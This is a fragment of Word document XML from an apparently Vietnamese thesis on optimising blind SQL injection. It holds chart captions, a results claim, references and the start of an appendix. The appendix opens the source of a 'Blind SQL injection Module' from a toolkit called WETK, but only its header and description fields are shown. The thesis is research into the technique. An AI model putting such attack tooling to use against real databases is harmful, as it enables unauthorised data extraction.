        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004E7ED7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Biểu đồ số lượng yêu </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">cầu và thời gian của từng phương pháp (trường hợp độ dài là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E5F74DC" wp14:editId="4F12ED25">
            <wp:extent cx="4572000" cy="3438525"/>
            <wp:effectExtent l="19050" t="0" r="19050" b="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571796" w:rsidRPr="003308DA" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="156" w:name="_Toc458436449"/>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003308DA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD584F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Biểu đồ số lượng yêu cầu và thời gian của từng phương pháp (trường hợp độ dài là 27)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="156"/>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Bằng các số liệu ở trên, phương pháp tấn công dựa trên phân tích số thứ tự cho thấy sự tối ưu vượt trội với các phươn</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">g pháp khác. Trung bình, phương pháp phân tích thứ tự bằng 1/7 các phương pháp tối ưu khác, và bằng 1/60 với các phương pháp truyền thống. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00571796" w:rsidRDefault="00571796" w:rsidP="00571796">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRPr="0025031B" w:rsidRDefault="0025031B" w:rsidP="004C4D4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>KẾT LUẬN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRDefault="00760373">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A25AB0" w:rsidRPr="00D55C73" w:rsidRDefault="00D55C73" w:rsidP="004C4D4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="157" w:name="_Toc459374362"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TÀI LIỆU THAM KHẢO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="157"/>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tiếng Việt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRPr="001604F9" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>[1] TS Lương Thế Dũng, “</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Giáo trình An toàn Cơ sở dữ liệu</w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">Học Viện Kỹ Thuật Mật Mã, </w:t>
      </w:r>
      <w:r w:rsidRPr="001604F9">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>(2010).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="532" w:lineRule="exact"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
        <w:t>Tiếng Anh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2] </w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dafydd Stuttard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Marcus</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Pinto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5457">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws, 2nd Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Wiley, (2011).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-48" w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E30">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Michal Zalewski</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72E30">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“The Tangled Web: A Guide to Securing Modern Web Applications 1st Edition”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D919BE">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No Starch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(2012).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[4] Hanqing Wu</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Liz Zhao</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Security: A WhiteHat Perspective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, CRC Press Book, (2015).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Justin Clarke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“SQL Injection Attacks and Defense, Second Edition 2nd Editi</w:t>
      </w:r>
      <w:r w:rsidRPr="002645D4">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>on”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Syngress, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(2012).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:r w:rsidRPr="00B92462">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Roberto Salgado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00B92462">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection Optimization and Obfuscation Techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, BlackHat EU 13, (2013).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F31C4" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hoàng Quốc Thịnh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Optimized Blind Sql Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Tetcon 2012, (2012)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325E74" w:rsidRDefault="007F31C4" w:rsidP="007F31C4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Daniel Kachakil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5844">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fast data extraction using SQL injection and XML statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”, Kachakill, (2013).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325E74" w:rsidRDefault="00325E74">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760373" w:rsidRDefault="00325E74" w:rsidP="00325E74">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc459374363"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PHỤ LỤC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w:rsidR="00B00A0E" w:rsidRDefault="00325E74" w:rsidP="00346AC0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Mã nguồn các module trong WETK</w:t>
      </w:r>
      <w:r w:rsidR="00346AC0">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> được sử dụng để thực nghiệm tối ưu hóa tấn công Blind SQL i</w:t>
      </w:r>
      <w:r w:rsidR="00346AC0">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>njection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00325E74" w:rsidRPr="001C48BA" w:rsidRDefault="00325E74" w:rsidP="001C48BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc459374364"/>
      <w:r w:rsidRPr="001C48BA">
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Module Blind SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9288"/>
      </w:tblGrid>
      <w:tr w:rsidR="00325E74" w:rsidTr="00325E74">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9288" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>#!/usr/bin/python</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>#author: namhb</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>import sys, os, string</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>from libs.coreHTTPModule import coreHTTPModule</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t># Load core module</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:t>class module(coreHTTPModule):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def __init__(self, logger, profile):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>coreHTTPModule.__init__(self, logger, profile)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.name</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Blind SQL injection Module"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.description </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Blind SQL injection with brute force character ( greater than 100 requests/character)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.rank</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"HIGH"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
